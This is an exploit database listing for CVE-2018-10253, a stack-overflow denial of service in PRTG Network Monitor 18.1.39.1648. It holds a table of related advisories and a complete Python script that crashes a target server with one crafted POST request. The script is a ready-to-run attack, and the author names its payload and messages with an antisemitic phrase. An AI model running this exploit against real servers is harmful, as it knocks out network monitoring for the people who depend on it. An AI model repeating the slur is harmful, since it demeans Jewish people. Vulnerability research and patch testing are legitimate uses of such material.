PRTG 18.1.39.1648 Stack Overflow

🗓️ 23 Apr 2018 00:00:00Reported by Lucas CarmoType

packetstorm🔗 packetstormsecurity.com👁 79 Views

PRTG 18.1.39.1648 Stack Overflow Exploi

Reporter	Title	Published	Views	Family All 9
0day.today	PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit	23 Apr 201800:00	–	zdt
CNVD	Paessler PRTG Network Monitor Denial of Service Vulnerability	24 Apr 201800:00	–	cnvd
CVE	CVE-2018-10253	21 Apr 201802:00	–	cve
Cvelist	CVE-2018-10253	21 Apr 201802:00	–	cvelist
Exploit DB	PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)	23 Apr 201800:00	–	exploitdb
exploitpack	PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)	23 Apr 201800:00	–	exploitpack
NVD	CVE-2018-10253	21 Apr 201802:29	–	nvd
OpenVAS	PRTG Network Monitor < 18.1.39.1648 Stack Overflow Vulnerability	24 Apr 201800:00	–	openvas
Prion	Code injection	21 Apr 201802:29	–	prion

`# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow  
# Date: 2018-04-21  
# Exploit Author: Lucas "luriel" Carmo  
# Vendor Homepage: https://www.paessler.com/prtg  
# Software Link: https://www.paessler.com/download/prtg-download  
# Version: 18.1.39.1648  
# CVE : CVE-2018-10253  
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5  
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/  
  
#!/usr/bin/python  
  
import requests  
import sys  
import os  
import re  
import socket  
  
green = "\033[1;32m"  
yellow = '\033[1;33m'  
normal = '\033[0;0m'  
banner = """  
aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaa aaaa aaa aaaaaa aaaaaaa aaaaaa aaa aaaa aaaa  
aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaa  
aaaaaaaaa aaa aa aaaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa  
aa aaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaa  
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaa aaaaaaaaa aaaaaa aaa aaaaaaaaaaaaaa aaa aaa  
aaaaaa aaaaaaaa aaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaaaa aaaaaa aaa aaaaaaaaaaaaaa aaa  
"""  
  
  
banner2 = """  
Author: @Lucas "luriel" Carmo  
"""  
  
os.system('clear')  
  
print(green+banner)  
print(yellow+banner2)  
print(normal)  
  
def check_http(url):  
pattern = re.compile("http://")  
return re.search(pattern, url)  
  
def sanitize_url(url):  
if(not check_http(url)):  
return "http://" + url  
return url  
  
def check_server(url):  
r = requests.get(url, timeout=4)  
code = r.status_code  
  
def send_jewish_payload(url):  
payload = {'file':'addmap.htm'}  
r = requests.post(url, params=payload)  
  
def main():  
try:  
if len(sys.argv) <= 3 and len (sys.argv) >= 2:  
try:  
url = sanitize_url(sys.argv[1])  
print(' [#] LOADING!')  
if (check_server(url) != 404):  
send_jewish_payload(url)  
else:  
print(' [!] Server shutdown or not found')  
except requests.exceptions.ConnectionError:  
print(' [~] BOOOOOM! PRTG Server has been exploded!')  
except requests.exceptions.InvalidURL:  
print(' [!] Invalid URL')  
except requests.exceptions.Timeout:  
print(' [!] Connection Timeout\n')  
else:  
print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')  
except KeyboardInterrupt:  
print(' [!] Jewish Napalm Canceled;.....[./]')  
if __name__ == '__main__':  
main()  
  
  
`

23 Apr 2018 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.10232